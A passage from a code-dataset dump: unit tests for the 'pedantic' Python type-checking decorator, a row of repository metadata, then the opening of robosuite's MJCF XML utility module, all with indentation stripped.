with self.assertRaises(expected_exception=PedanticTypeCheckException):
foo(a=date(1995, 2, 5), b=date(1987, 8, 7))
def test_any_type(self):
@pedantic
def foo(a: Any) -> None:
pass
foo(a='aa')
def test_callable_exact_arg_count(self):
@pedantic
def foo(a: Callable[[int, str], int]) -> None:
pass
def some_callable(x: int, y: str) -> int:
pass
foo(a=some_callable)
def test_callable_bad_type(self):
@pedantic
def foo(a: Callable[..., int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=5)
def test_callable_too_few_arguments(self):
@pedantic
def foo(a: Callable[[int, str], int]) -> None:
pass
def some_callable(x: int) -> int:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=some_callable)
def test_callable_mandatory_kwonlyargs(self):
@pedantic
def foo(a: Callable[[int, str], int]) -> None:
pass
def some_callable(x: int, y: str, *, z: float, bar: str) -> int:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=some_callable)
def test_callable_class(self):
"""
Test that passing a class as a callable does not count the "self" argument "a"gainst the
ones declared in the Callable specification.
"""
@pedantic
def foo(a: Callable[[int, str], Any]) -> None:
pass
class SomeClass:
def __init__(self, x: int, y: str):
pass
foo(a=SomeClass)
def test_callable_plain(self):
@pedantic
def foo(a: Callable[..., Any]) -> None:
pass
def callback(a):
pass
foo(a=callback)
def test_callable_bound_method(self):
@pedantic
def foo(callback: Callable[[int], Any]) -> None:
pass
foo(callback=Child().method)
def test_callable_defaults(self):
"""
Test that a callable having "too many" arguments don't raise an error if the extra
arguments have default values.
"""
@pedantic
def foo(callback: Callable[[int, str], Any]) -> None:
pass
def some_callable(x: int, y: str, z: float = 1.2) -> int:
pass
foo(callback=some_callable)
def test_callable_builtin(self):
@pedantic
def foo(callback: types.BuiltinFunctionType) -> None:
pass
foo(callback=[].append)
def test_dict_bad_type(self):
@pedantic
def foo(a: Dict[str, int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=5)
def test_dict_bad_key_type(self):
@pedantic
def foo(a: Dict[str, int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a={1: 2})
def test_dict_bad_value_type(self):
@pedantic
def foo(a: Dict[str, int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a={'x': 'a'})
def test_list_bad_type(self):
@pedantic
def foo(a: List[int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=5)
def test_list_bad_element(self):
@pedantic
def foo(a: List[int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=[1, 2, 'bb'])
def test_sequence_bad_type(self):
@pedantic
def foo(a: Sequence[int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=5)
def test_sequence_bad_element(self):
@pedantic
def foo(a: Sequence[int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=[1, 2, 'bb'])
def test_abstractset_custom_type(self):
T = TypeVar('T')
@pedantic_class
class DummySet(AbstractSet[T]):
def __contains__(self, x: object) -> bool:
return x == 1
def __len__(self) -> T:
return 1
def __iter__(self) -> Iterator[T]:
yield 1
@pedantic
def foo(a: AbstractSet[int]) -> None:
pass
foo(a=DummySet[int]())
def test_abstractset_bad_type(self):
@pedantic
def foo(a: AbstractSet[int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=5)
def test_set_bad_type(self):
@pedantic
def foo(a: Set[int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=5)
def test_abstractset_bad_element(self):
@pedantic
def foo(a: AbstractSet[int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a={1, 2, 'bb'})
def test_set_bad_element(self):
@pedantic
def foo(a: Set[int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a={1, 2, 'bb'})
def test_tuple_bad_type(self):
@pedantic
def foo(a: Tuple[int]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=5)
def test_tuple_too_many_elements(self):
@pedantic
def foo(a: Tuple[int, str]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=(1, 'aa', 2))
def test_tuple_too_few_elements(self):
@pedantic
def foo(a: Tuple[int, str]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=(1,))
def test_tuple_bad_element(self):
@pedantic
def foo(a: Tuple[int, str]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=(1, 2))
def test_tuple_ellipsis_bad_element(self):
@pedantic
def foo(a: Tuple[int, ...]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=(1, 2, 'blah'))
def test_namedtuple(self):
Employee = NamedTuple('Employee', [('name', str), ('id', int)])
@pedantic
def foo(bar: Employee) -> None:
print(bar)
foo(bar=Employee('bob', 1))
def test_namedtuple_key_mismatch(self):
Employee1 = NamedTuple('Employee', [('name', str), ('id', int)])
Employee2 = NamedTuple('Employee', [('firstname', str), ('id', int)])
@pedantic
def foo(bar: Employee1) -> None:
print(bar)
with self.assertRaises(PedanticTypeCheckException):
foo(bar=Employee2('bob', 1))
def test_namedtuple_type_mismatch(self):
Employee = NamedTuple('Employee', [('name', str), ('id', int)])
@pedantic
def foo(bar: Employee) -> None:
print(bar)
with self.assertRaises(PedanticTypeCheckException):
foo(bar=('bob', 1))
def test_namedtuple_huge_type_mismatch(self):
Employee = NamedTuple('Employee', [('name', str), ('id', int)])
@pedantic
def foo(bar: int) -> None:
print(bar)
with self.assertRaises(PedanticTypeCheckException):
foo(bar=foo(bar=Employee('bob', 1)))
def test_namedtuple_wrong_field_type(self):
Employee = NamedTuple('Employee', [('name', str), ('id', int)])
@pedantic
def foo(bar: Employee) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(bar=Employee(2, 1))
def test_union(self):
@pedantic
def foo(a: Union[str, int]) -> None:
pass
for value in [6, 'xa']:
foo(a=value)
def test_union_new_syntax(self):
if sys.version_info < (3, 10):
return
@pedantic
def foo(a: str | int) -> None:
pass
for value in [6, 'xa']:
foo(a=value)
with self.assertRaises(PedanticTypeCheckException):
foo(a=1.7)
def test_union_typing_type(self):
@pedantic
def foo(a: Union[str, Collection]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=1)
def test_union_fail(self):
@pedantic
def foo(a: Union[str, int]) -> None:
pass
for value in [5.6, b'xa']:
with self.assertRaises(PedanticTypeCheckException):
foo(a=value)
def test_type_var_constraints(self):
T = TypeVar('T', int, str)
@pedantic
def foo(a: T, b: T) -> None:
pass
for values in [
{'a': 6, 'b': 7},
{'a': 'aa', 'b': "bb"},
]:
foo(**values)
def test_type_var_constraints_fail_typing_type(self):
T = TypeVar('T', int, Collection)
@pedantic
def foo(a: T, b: T) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a='aa', b='bb')
def test_typevar_constraints_fail(self):
T = TypeVar('T', int, str)
@pedantic
def foo(a: T, b: T) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=2.5, b='aa')
def test_typevar_bound(self):
T = TypeVar('T', bound=Parent)
@pedantic
def foo(a: T, b: T) -> None:
pass
foo(a=Child(), b=Child())
def test_type_var_bound_fail(self):
T = TypeVar('T', bound=Child)
@pedantic
def foo(a: T, b: T) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=Parent(), b=Parent())
def test_type_var_invariant_fail(self):
T = TypeVar('T', int, str)
@pedantic
def foo(a: T, b: T) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=2, b=3.6)
def test_type_var_covariant(self):
T = TypeVar('T', covariant=True)
@pedantic
def foo(a: T, b: T) -> None:
pass
foo(a=Parent(), b=Child())
def test_type_var_covariant_fail(self):
T = TypeVar('T', covariant=True)
@pedantic
def foo(a: T, b: T) -> None:
pass
with self.assertRaises(PedanticTypeVarMismatchException):
foo(a=Child(), b=Parent())
def test_type_var_contravariant(self):
T = TypeVar('T', contravariant=True)
@pedantic
def foo(a: T, b: T) -> None:
pass
foo(a=Child(), b=Parent())
def test_type_var_contravariant_fail(self):
T = TypeVar('T', contravariant=True)
@pedantic
def foo(a: T, b: T) -> None:
pass
with self.assertRaises(PedanticTypeVarMismatchException):
foo(a=Parent(), b=Child())
def test_class_bad_subclass(self):
@pedantic
def foo(a: Type[Child]) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=Parent)
def test_class_any(self):
@pedantic
def foo(a: Type[Any]) -> None:
pass
foo(a=str)
def test_wrapped_function(self):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
return wrapper
@pedantic
@decorator
def foo(a: 'Child') -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=Parent())
def test_mismatching_default_type(self):
@pedantic
def foo(a: str = 1) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo()
def test_implicit_default_none(self):
"""
Test that if the default value is ``None``, a ``None`` argument can be passed.
"""
@pedantic
def foo(a: Optional[str] = None) -> None:
pass
foo()
def test_generator_simple(self):
"""Test that argument type checking works in a generator function too."""
@pedantic
def generate(a: int) -> Generator[int, int, None]:
yield a
yield a + 1
gen = generate(a=1)
next(gen)
def test_wrapped_generator_no_return_type_annotation(self):
"""Test that return type checking works in a generator function too."""
@pedantic
def generate(a: int) -> Generator[int, int, None]:
yield a
yield a + 1
gen = generate(a=1)
next(gen)
def test_varargs(self):
@pedantic
def foo(*args: int) -> None:
pass
foo(1, 2)
def test_varargs_fail(self):
@pedantic
def foo(*args: int) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(1, 'a')
def test_kwargs(self):
@pedantic
def foo(**kwargs: int) -> None:
pass
foo(a=1, b=2)
def test_kwargs_fail(self):
@pedantic
def foo(**kwargs: int) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=1, b='a')
def test_generic(self):
T_Foo = TypeVar('T_Foo')
class FooGeneric(Generic[T_Foo]):
pass
@pedantic
def foo(a: FooGeneric[str]) -> None:
print(a)
foo(a=FooGeneric[str]())
def test_newtype(self):
myint = NewType("myint", int)
@pedantic
def foo(a: myint) -> int:
return 42
assert foo(a=1) == 42
with self.assertRaises(PedanticTypeCheckException):
foo(a="a")
def test_collection(self):
@pedantic
def foo(a: Collection) -> None:
pass
with self.assertRaises(PedanticTypeCheckException):
foo(a=True)
def test_binary_io(self):
@pedantic
def foo(a: BinaryIO) -> None:
print(a)
foo(a=BytesIO())
def test_text_io(self):
@pedantic
def foo(a: TextIO) -> None:
print(a)
foo(a=StringIO())
def test_binary_io_fail(self):
@pedantic
def foo(a: TextIO) -> None:
print(a)
with self.assertRaises(PedanticTypeCheckException):
foo(a=BytesIO())
def test_text_io_fail(self):
@pedantic
def foo(a: BinaryIO) -> None:
print(a)
with self.assertRaises(PedanticTypeCheckException):
foo(a=StringIO())
def test_binary_io_real_file(self):
@pedantic
def foo(a: BinaryIO) -> None:
print(a)
with open(file=TEST_FILE, mode='wb') as f:
foo(a=f)
def test_text_io_real_file(self):
@pedantic
def foo(a: TextIO) -> None:
print(a)
with open(file=TEST_FILE, mode='w') as f:
foo(a=f)
def test_pedantic_return_type_var_fail(self):
T = TypeVar('T', int, float)
@pedantic
def foo(a: T, b: T) -> T:
return 'a'
with self.assertRaises(PedanticTypeCheckException):
foo(a=4, b=2)
def test_callable(self):
@pedantic
def foo_1(a: Callable[..., int]) -> None:
print(a)
@pedantic
def foo_2(a: Callable) -> None:
print(a)
def some_callable() -> int:
return 4
foo_1(a=some_callable)
with self.assertRaises(PedanticTypeCheckException):
foo_2(a=some_callable)
def test_list(self):
@pedantic
def foo_1(a: List[int]) -> None:
print(a)
@pedantic
def foo_2(a: List) -> None:
print(a)
@pedantic
def foo_3(a: list) -> None:
print(a)
foo_1(a=[1, 2])
with self.assertRaises(PedanticTypeCheckException):
foo_2(a=[1, 2])
with self.assertRaises(PedanticTypeCheckException):
foo_3(a=[1, 2])
def test_dict(self):
@pedantic
def foo_1(a: Dict[str, int]) -> None:
print(a)
@pedantic
def foo_2(a: Dict) -> None:
print(a)
@pedantic
def foo_3(a: dict) -> None:
print(a)
foo_1(a={'x': 2})
with self.assertRaises(PedanticTypeCheckException):
foo_3(a={'x': 2})
with self.assertRaises(PedanticTypeCheckException):
foo_3(a={'x': 2})
def test_sequence(self):
@pedantic
def foo(a: Sequence[str]) -> None:
print(a)
for value in [('a', 'b'), ['a', 'b'], 'abc']:
foo(a=value)
def test_sequence_no_type_args(self):
@pedantic
def foo(a: Sequence) -> None:
print(a)
for value in [('a', 'b'), ['a', 'b'], 'abc']:
with self.assertRaises(PedanticTypeCheckException):
foo(a=value)
def test_iterable(self):
@pedantic
def foo(a: Iterable[str]) -> None:
print(a)
for value in [('a', 'b'), ['a', 'b'], 'abc']:
foo(a=value)
def test_iterable_no_type_args(self):
@pedantic
def foo(a: Iterable) -> None:
print(a)
for value in [('a', 'b'), ['a', 'b'], 'abc']:
with self.assertRaises(PedanticTypeCheckException):
foo(a=value)
def test_container(self):
@pedantic
def foo(a: Container[str]) -> None:
print(a)
for value in [('a', 'b'), ['a', 'b'], 'abc']:
foo(a=value)
def test_container_no_type_args(self):
@pedantic
def foo(a: Container) -> None:
print(a)
for value in [('a', 'b'), ['a', 'b'], 'abc']:
with self.assertRaises(PedanticTypeCheckException):
foo(a=value)
def test_set(self):
@pedantic
def foo_1(a: AbstractSet[int]) -> None:
print(a)
@pedantic
def foo_2(a: Set[int]) -> None:
print(a)
for value in [set(), {6}]:
foo_1(a=value)
foo_2(a=value)
def test_set_no_type_args(self):
@pedantic
def foo_1(a: AbstractSet) -> None:
print(a)
@pedantic
def foo_2(a: Set) -> None:
print(a)
@pedantic
def foo_3(a: set) -> None:
print(a)
for value in [set(), {6}]:
with self.assertRaises(PedanticTypeCheckException):
foo_1(a=value)
with self.assertRaises(PedanticTypeCheckException):
foo_2(a=value)
with self.assertRaises(PedanticTypeCheckException):
foo_3(a=value)
def test_tuple(self):
@pedantic
def foo_1(a: Tuple[int, int]) -> None:
print(a)
@pedantic
def foo_2(a: Tuple[int, ...]) -> None:
print(a)
foo_1(a=(1, 2))
foo_2(a=(1, 2))
def test_tuple_no_type_args(self):
@pedantic
def foo_1(a: Tuple) -> None:
print(a)
@pedantic
def foo_2(a: tuple) -> None:
print(a)
with self.assertRaises(PedanticTypeCheckException):
foo_1(a=(1, 2))
with self.assertRaises(PedanticTypeCheckException):
foo_2(a=(1, 2))
def test_empty_tuple(self):
@pedantic
def foo(a: Tuple[()]) -> None:
print(a)
foo(a=())
def test_class(self):
@pedantic
def foo_1(a: Type[Parent]) -> None:
print(a)
@pedantic
def foo_2(a: Type[TypeVar('UnboundType')]) -> None:
print(a)
@pedantic
def foo_3(a: Type[TypeVar('BoundType', bound=Parent)]) -> None:
print(a)
foo_1(a=Child)
foo_2(a=Child)
foo_3(a=Child)
def test_class_no_type_vars(self):
@pedantic
def foo_1(a: Type) -> None:
print(a)
@pedantic
def foo_2(a: type) -> None:
print(a)
with self.assertRaises(PedanticTypeCheckException):
foo_1(a=Child)
with self.assertRaises(PedanticTypeCheckException):
foo_2(a=Child)
def test_class_not_a_class(self):
@pedantic
def foo(a: Type[Parent]) -> None:
print(a)
with self.assertRaises(PedanticTypeCheckException):
foo(a=1)
def test_complex(self):
@pedantic
def foo(a: complex) -> None:
print(a)
foo(a=complex(1, 5))
with self.assertRaises(PedanticTypeCheckException):
foo(a=1.0)
def test_float(self):
@pedantic
def foo(a: float) -> None:
print(a)
foo(a=1.5)
with self.assertRaises(PedanticTypeCheckException):
foo(a=1)
def test_coroutine_correct_return_type(self):
@pedantic
async def foo() -> str:
return 'foo'
coro = foo()
with self.assertRaises(StopIteration):
coro.send(None)
def test_coroutine_wrong_return_type(self):
@pedantic
async def foo() -> str:
return 1
coro = foo()
with self.assertRaises(PedanticTypeCheckException):
coro.send(None)
def test_bytearray_bytes(self):
@pedantic
def foo(x: bytearray) -> None:
pass
foo(x=bytearray([1]))
def test_class_decorator(self):
@pedantic_class
class Foo:
@staticmethod
def staticmethod() -> int:
return 'foo'
@classmethod
def classmethod(cls) -> int:
return 'foo'
def method(self) -> int:
return 'foo'
with self.assertRaises(PedanticTypeCheckException):
Foo.staticmethod()
with self.assertRaises(PedanticTypeCheckException):
Foo.classmethod()
with self.assertRaises(PedanticTypeCheckException):
Foo().method()
def test_generator(self):
@pedantic
def genfunc() -> Generator[int, str, List[str]]:
val1 = yield 2
val2 = yield 3
val3 = yield 4
return [val1, val2, val3]
gen = genfunc()
with self.assertRaises(StopIteration):
value = next(gen)
while True:
value = gen.send(str(value))
assert isinstance(value, int)
def test_generator_no_type_args(self):
@pedantic
def genfunc() -> Generator:
val1 = yield 2
val2 = yield 3
val3 = yield 4
return [val1, val2, val3]
with self.assertRaises(PedanticTypeCheckException):
genfunc()
def test_iterator(self):
@pedantic
def genfunc() -> Iterator[int]:
val1 = yield 2
val2 = yield 3
val3 = yield 4
return [val1, val2, val3]
gen = genfunc()
with self.assertRaises(PedanticTypeCheckException):
value = next(gen)
while True:
value = gen.send(str(value))
assert isinstance(value, int)
def test_iterator_no_type_args(self):
@pedantic
def genfunc() -> Iterator:
val1 = yield 2
val2 = yield 3
val3 = yield 4
return [val1, val2, val3]
with self.assertRaises(PedanticTypeCheckException):
genfunc()
def test_iterable_advanced(self):
@pedantic
def genfunc() -> Iterable[int]:
val1 = yield 2
val2 = yield 3
val3 = yield 4
return [val1, val2, val3]
gen = genfunc()
with self.assertRaises(PedanticTypeCheckException):
value = next(gen)
while True:
value = gen.send(str(value))
assert isinstance(value, int)
def test_iterable_advanced_no_type_args(self):
@pedantic
def genfunc() -> Iterable:
val1 = yield 2
val2 = yield 3
val3 = yield 4
return [val1, val2, val3]
with self.assertRaises(PedanticTypeCheckException):
genfunc()
def test_generator_bad_yield(self):
@pedantic
def genfunc_1() -> Generator[int, str, None]:
yield 'foo'
@pedantic
def genfunc_2() -> Iterable[int]:
yield 'foo'
@pedantic
def genfunc_3() -> Iterator[int]:
yield 'foo'
gen = genfunc_1()
with self.assertRaises(PedanticTypeCheckException):
next(gen)
gen = genfunc_2()
with self.assertRaises(PedanticTypeCheckException):
next(gen)
gen = genfunc_3()
with self.assertRaises(PedanticTypeCheckException):
next(gen)
def test_generator_bad_send(self):
@pedantic
def genfunc() -> Generator[int, str, None]:
yield 1
yield 2
gen = genfunc()
next(gen)
with self.assertRaises(PedanticTypeCheckException):
gen.send(2)
def test_generator_bad_return(self):
@pedantic
def genfunc() -> Generator[int, str, str]:
yield 1
return 6
gen = genfunc()
next(gen)
with self.assertRaises(PedanticTypeCheckException):
gen.send('foo')
def test_return_generator(self):
@pedantic
def genfunc() -> Generator[int, None, None]:
yield 1
@pedantic
def foo() -> Generator[int, None, None]:
return genfunc()
foo()
def test_local_class(self):
@pedantic_class
class LocalClass:
class Inner:
pass
def create_inner(self) -> 'Inner':
return self.Inner()
retval = LocalClass().create_inner()
assert isinstance(retval, LocalClass.Inner)
def test_local_class_async(self):
@pedantic_class
class LocalClass:
class Inner:
pass
async def create_inner(self) -> 'Inner':
return self.Inner()
coro = LocalClass().create_inner()
with self.assertRaises(StopIteration):
coro.send(None)
def test_callable_nonmember(self):
class CallableClass:
def __call__(self):
pass
@pedantic_class
class LocalClass:
some_callable = CallableClass()
def test_inherited_class_method(self):
@pedantic_class
class Parent:
@classmethod
def foo(cls, x: str) -> str:
return cls.__name__
@pedantic_class
class Child(Parent):
pass
self.assertEqual('Parent', Child.foo(x='bar'))
with self.assertRaises(PedanticTypeCheckException):
Child.foo(x=1)
def test_type_var_forward_ref_bound(self):
TBound = TypeVar('TBound', bound='Parent')
@pedantic
def func(x: TBound) -> None:
pass
func(x=Parent())
with self.assertRaises(PedanticTypeCheckException):
func(x='foo')
def test_noreturn(self):
@pedantic
def foo() -> NoReturn:
pass
with self.assertRaises(PedanticTypeCheckException):
foo()
def test_literal(self):
if sys.version_info < (3, 8):
return
from typing import Literal
@pedantic
def foo(a: Literal[1, True, 'x', b'y', 404]) -> None:
print(a)
foo(a=404)
foo(a=True)
foo(a='x')
with self.assertRaises(PedanticTypeCheckException):
foo(a=4)
def test_literal_union(self):
if sys.version_info < (3, 8):
return
from typing import Literal
@pedantic
def foo(a: Union[str, Literal[1, 6, 8]]) -> None:
print(a)
foo(a=6)
with self.assertRaises(PedanticTypeCheckException):
foo(a=4)
def test_literal_illegal_value(self):
if sys.version_info < (3, 8):
return
from typing import Literal
@pedantic
def foo(a: Literal[1, 1.1]) -> None:
print(a)
with self.assertRaises(PedanticTypeCheckException):
foo(a=4)
def test_enum(self):
with self.assertRaises(PedanticTypeCheckException):
@pedantic_class
class MyEnum(Enum):
A = 'a'
def test_enum_aggregate(self):
T = TypeVar('T', bound=IntEnum)
@pedantic_class
class EnumAggregate(Generic[T]):
enum: ClassVar[Type[T]]
def __init__(self, value: Union[int, str, List[T]]) -> None:
assert len(self.enum) < 10
if value == '':
raise ValueError(f'Parameter "value" cannot be empty!')
if isinstance(value, list):
self._value = ''.join([str(x.value) for x in value])
else:
self._value = str(value)
self._value = ''.join(sorted(self._value)) # sort characters in string
self.to_list() # check if is valid
def __contains__(self, item: T) -> bool:
return item in self.to_list()
def __eq__(self, other: Union['EnumAggregate', str]) -> bool:
if isinstance(other, str):
return self._value == other
return self._value == other._value
def __str__(self) -> str:
return self._value
def to_list(self) -> List[T]:
return [self.enum(int(character)) for character in self._value]
@property
def value(self) -> str:
return self._value
@classmethod
def all(cls) -> str:
return ''.join([str(x.value) for x in cls.enum])
class Gender(IntEnum):
MALE = 1
FEMALE = 2
DIVERS = 3
@pedantic_class
class Genders(EnumAggregate[Gender]):
enum = Gender
Genders(value=12)
with self.assertRaises(PedanticTypeCheckException):
Genders(value=Child())
| 26.833543
| 117
| 0.544439
| 63,268
| 0.988593
| 4,664
| 0.072877
| 25,277
| 0.394965
| 168
| 0.002625
| 2,810
| 0.043908
|
369fa166feeca798a146fe563bb6633de1435b63
| 12,391
|
py
|
Python
|
robosuite/utils/mjcf_utils.py
|
kyungjaelee/robosuite
|
0d73fcca9ed8e638632f4bd7b0f1b8ebf4640fb1
|
[
"MIT"
] | null | null | null |
robosuite/utils/mjcf_utils.py
|
kyungjaelee/robosuite
|
0d73fcca9ed8e638632f4bd7b0f1b8ebf4640fb1
|
[
"MIT"
] | null | null | null |
robosuite/utils/mjcf_utils.py
|
kyungjaelee/robosuite
|
0d73fcca9ed8e638632f4bd7b0f1b8ebf4640fb1
|
[
"MIT"
] | 1
|
2021-03-26T19:10:00.000Z
|
2021-03-26T19:10:00.000Z
|
# utility functions for manipulating MJCF XML models
import xml.etree.ElementTree as ET
import os
import numpy as np
from collections.abc import Iterable
from PIL import Image
from pathlib import Path
import robosuite
# RGBA color constants (solid red / green / blue, fully opaque).
RED = [1, 0, 0, 1]
GREEN = [0, 1, 0, 1]
BLUE = [0, 0, 1, 1]
# Friendly texture alias -> png filename under the assets "textures/" folder;
# CustomMaterial resolves these via xml_path_completion("textures/" + filename).
TEXTURES = {
    "WoodRed": "red-wood.png",
    "WoodGreen": "green-wood.png",
    "WoodBlue": "blue-wood.png",
    "WoodLight": "light-wood.png",
    "WoodDark": "dark-wood.png",
    "WoodTiles": "wood-tiles.png",
    "WoodPanels": "wood-varnished-panels.png",
    "WoodgrainGray": "gray-woodgrain.png",
    "PlasterCream": "cream-plaster.png",
    "PlasterPink": "pink-plaster.png",
    "PlasterYellow": "yellow-plaster.png",
    "PlasterGray": "gray-plaster.png",
    "PlasterWhite": "white-plaster.png",
    "BricksWhite": "white-bricks.png",
    "Metal": "metal.png",
    "SteelBrushed": "steel-brushed.png",
    "SteelScratched": "steel-scratched.png",
    "Brass": "brass-ambra.png",
    "Bread": "bread.png",
    "Can": "can.png",
    "Ceramic": "ceramic.png",
    "Cereal": "cereal.png",
    "Clay": "clay.png",
    "Dirt": "dirt.png",
    "Glass": "glass.png",
    "FeltGray": "gray-felt.png",
    "Lemon": "lemon.png",
}
# All valid texture aliases (a live dict-keys view over TEXTURES).
ALL_TEXTURES = TEXTURES.keys()
def xml_path_completion(xml_path):
    """Resolve a MJCF asset path to a full path.

    Paths that are already absolute (start with "/") are returned untouched;
    anything else is resolved relative to the assets directory shipped with
    the robosuite package.

    Args:
        xml_path (str): local xml path

    Returns:
        str: Full (absolute) xml path
    """
    if xml_path.startswith("/"):
        return xml_path
    return os.path.join(robosuite.models.assets_root, xml_path)
def array_to_string(array):
    """Serialize a numeric iterable into mujoco's space-separated string form.

    Examples:
        [0, 1, 2] => "0 1 2"
    """
    return " ".join(str(value) for value in array)
def string_to_array(string):
    """
    Converts an array string in mujoco xml to np.array.

    Examples:
        "0 1 2" => [0, 1, 2]

    Args:
        string (str): String to convert to an array

    Returns:
        np.array: Numerical array equivalent of @string
    """
    # split() with no argument tolerates repeated / leading / trailing
    # whitespace; split(" ") produced empty tokens there, which made
    # float("") raise ValueError on otherwise-valid attribute strings.
    return np.array([float(x) for x in string.split()])
def set_alpha(node, alpha=0.1):
    """Set the a(lpha) component of every rgba attribute under @node.

    Walks @node's subtree, rewriting each element's rgba so the first three
    channels are preserved and the alpha channel becomes @alpha. Used for
    managing display transparency.

    Args:
        node (ET.Element): Specific node element within XML tree
        alpha (float): Value to set alpha value of rgba tuple
    """
    for descendant in node.findall(".//*[@rgba]"):
        rgb = list(string_to_array(descendant.get("rgba"))[0:3])
        descendant.set("rgba", array_to_string(rgb + [alpha]))
def new_joint(**kwargs):
    """Create a <joint> tag whose attributes are exactly @**kwargs.

    Args:
        **kwargs (dict): Specified attributes for the new joint

    Returns:
        ET.Element: new joint xml element
    """
    return ET.Element("joint", attrib=kwargs)
def new_actuator(joint, act_type="actuator", **kwargs):
    """Create an actuator tag with attributes specified by @**kwargs.

    Args:
        joint (str): type of actuator transmission.
            see all types here: http://mujoco.org/book/modeling.html#actuator
        act_type (str): actuator type. Defaults to "actuator"
        **kwargs (dict): Any additional specified attributes for the new joint

    Returns:
        ET.Element: new actuator xml element
    """
    actuator = ET.Element(act_type, attrib=kwargs)
    actuator.set("joint", joint)
    return actuator
def new_site(name, rgba=RED, pos=(0, 0, 0), size=(0.005,), **kwargs):
    """Create a <site> element with attributes specified by @**kwargs.

    NOTE: With the exception of @name, @pos, and @size, any attribute whose
    value is None is dropped before building the XML element.

    Args:
        name (str): site name.
        rgba (4-array): (r,g,b,a) color and transparency. Defaults to solid red.
        pos (3-array): (x,y,z) 3d position of the site.
        size (array of float): site size (sites are spherical by default).
        **kwargs (dict): Any additional specified attributes for the new site

    Returns:
        ET.Element: new site xml element
    """
    attribs = dict(kwargs)
    attribs["name"] = name
    attribs["pos"] = array_to_string(pos)
    attribs["size"] = array_to_string(size)
    attribs["rgba"] = array_to_string(rgba) if rgba is not None else None
    # Drop every attribute explicitly set to None.
    filtered = {k: v for k, v in attribs.items() if v is not None}
    return ET.Element("site", attrib=filtered)
def new_geom(geom_type, size, pos=(0, 0, 0), rgba=RED, group=0, **kwargs):
    """Create a <geom> element with attributes specified by @**kwargs.

    NOTE: With the exception of @geom_type, @size, and @pos, any attribute
    whose value is None is dropped before building the XML element.

    Args:
        geom_type (str): type of the geom.
            see all types here: http://mujoco.org/book/modeling.html#geom
        size (array of float): geom size parameters.
        pos (3-array): (x,y,z) 3d position of the site.
        rgba (4-array): (r,g,b,a) color and transparency. Defaults to solid red.
        group (int): the integer group that the geom belongs to. useful for
            separating visual and physical elements.
        **kwargs (dict): Any additional specified attributes for the new geom

    Returns:
        ET.Element: new geom xml element
    """
    attribs = dict(kwargs)
    attribs["type"] = str(geom_type)
    attribs["size"] = array_to_string(size)
    attribs["pos"] = array_to_string(pos)
    attribs["rgba"] = array_to_string(rgba) if rgba is not None else None
    attribs["group"] = str(group) if group is not None else None
    # Drop every attribute explicitly set to None.
    filtered = {k: v for k, v in attribs.items() if v is not None}
    return ET.Element("geom", attrib=filtered)
def new_body(name=None, pos=None, **kwargs):
    """Create a <body> element with attributes specified by @**kwargs.

    Args:
        name (str): body name; omitted from the element when None.
        pos (3-array): (x,y,z) 3d position of the body frame; omitted when None.
        **kwargs (dict): Any additional specified attributes for the new body

    Returns:
        ET.Element: new body xml element
    """
    attribs = dict(kwargs)
    if name is not None:
        attribs["name"] = name
    if pos is not None:
        attribs["pos"] = array_to_string(pos)
    return ET.Element("body", attrib=attribs)
def new_inertial(name=None, pos=(0, 0, 0), mass=None, **kwargs):
    """Create an <inertial> element with attributes specified by @**kwargs.

    Args:
        name (str): accepted for signature compatibility but not used.
        pos (3-array): (x,y,z) 3d position of the inertial frame.
        mass (float): The mass of inertial; omitted from the element when None.
        **kwargs (dict): Any additional specified attributes for the new
            inertial element

    Returns:
        ET.Element: new inertial xml element
    """
    attribs = dict(kwargs)
    if mass is not None:
        attribs["mass"] = str(mass)
    attribs["pos"] = array_to_string(pos)
    return ET.Element("inertial", attrib=attribs)
def postprocess_model_xml(xml_str):
    """
    This function postprocesses the model.xml collected from a MuJoCo demonstration
    in order to make sure that the STL files can be found.

    Rewrites every <mesh>/<texture> "file" attribute so that the part of the
    path after the last "robosuite" directory is re-rooted at the locally
    installed robosuite package.

    Args:
        xml_str (str): Mujoco sim demonstration XML file as string

    Returns:
        str: Post-processed xml file as string
    """
    # Directory of the installed robosuite package (new path prefix).
    path = os.path.split(robosuite.__file__)[0]
    # NOTE(review): splitting/joining on "/" assumes POSIX-style paths —
    # confirm behavior on Windows installs.
    path_split = path.split("/")
    # replace mesh and texture file paths
    tree = ET.fromstring(xml_str)
    root = tree
    asset = root.find("asset")
    meshes = asset.findall("mesh")
    textures = asset.findall("texture")
    all_elements = meshes + textures
    for elem in all_elements:
        old_path = elem.get("file")
        if old_path is None:
            continue
